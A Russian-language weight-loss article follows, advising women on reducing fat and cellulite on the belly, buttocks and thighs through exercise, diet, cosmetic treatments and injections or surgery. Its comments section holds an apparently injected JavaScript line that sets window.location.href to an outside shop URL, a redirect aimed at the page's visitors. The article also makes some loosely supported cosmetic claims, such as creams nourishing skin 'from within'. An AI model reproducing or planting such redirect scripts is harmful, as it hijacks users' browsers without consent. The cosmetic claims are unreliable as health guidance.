Как избавиться от проблемных зон на теле?

Бич большинства современных женщин – целлюлит и жировые отложения. И как назло, больше всего страдают самые привлекательные части тела – живот, ягодицы и бедра. Именно здесь жир откладывается в первую очередь и, соответственно, сжигается в последнюю…

Действительно, приятного здесь мало, но и повода для паники или расстройства нет абсолютно никакого! Многолетняя практика и исследования показывают, что победить жир можно. Правда, при соблюдении определенных условий.

Как эффективно похудеть?

Первое, что нужно сделать для того, чтобы распрощаться с излишками жира – ознакомиться с методиками сжигания жировых отложений. Их не так уж и много:

  • Спортивные нагрузки, коррекция проблемных зон с помощью упражнений
  • Правильное, сбалансированное питание
  • Косметологическое воздействие
  • Специальные инъекции и операции по откачиванию жира

Например, если вы уже давно мучаетесь вопросом «как похудеть в ляшках?», то ответ становится вполне очевидным – необходимо выбрать один (но желательно все-таки несколько) из предложенных выше методов и сделать его частью своей жизни. Но что бы вы не выбрали, помните: результат приносит только систематический, регулярный подход, а не одноразовое действие. Чем больше методов одновременно вы задействуете, тем быстрее и ярче будет эффект.

Для того, чтобы понимать, что именно подходит вам, рассмотрим эти методы подробнее.

Спортивные нагрузки. Существует масса упражнений, разработанных для проблемных зон, в частности бедер, ягодиц и ног. Для ежедневных занятий скачайте себе видео уроки с Интернета, запишитесь в спортзал или же просто вспомните школьные уроки физкультуры, где вы делали «ножницы», «велосипед», «выпады» и т.д. Заниматься надо один раз в день по 1 часу или же два раза по 30 минут.

Сбалансированное питание. Очень эффективно дополнять физические упражнения некоторыми ограничениями в еде. Так, например, похудеть в бедрах помогает отказ от мучной пищи, выпечки, сахара. Особое внимание также уделите питью – организм должен получать свою суточную норму, но не забывайте следить за тем, вся ли жидкость выводится из организма, не задерживается ли она в тканях, создавая вам эффект «галифе».

Косметологическое воздействие. Массажи, спа процедуры, обертывания тела, безусловно, дают свои положительные плоды. Косметологические средства, которые при этом используются способны проникать глубоко в кожу, питать ее изнутри, что делает ее значительно привлекательнее, изъяны исчезают. С помощью таких процедур подтянуть мышцы, убрать объемы можно очень быстро, но для похудения придется прибегнуть и к первым двум методам – физическим нагрузкам и правильному питанию.

Инъекции красоты и хирургическое вмешательство. Иногда если у женщины не хватает силы воли или времени заниматься собой, она решает прибегнуть к медицинской помощи. На сегодняшний день существует множество способов вернуть себе стройность без каких- либо усилий. Однако, у этого способа есть и обратная сторона медали – лишний вес возвращается так же быстро, как и уходит, стоит только вернуться к привычному образу жизни. Поэтому для долгосрочного результата и надежного его закрепления придется все-таки потрудиться.

hopira

Комментарии

  • window.location.href='http://www.bags-boutique.ru/action/?entranceId=9390_0_0'1551201524.3192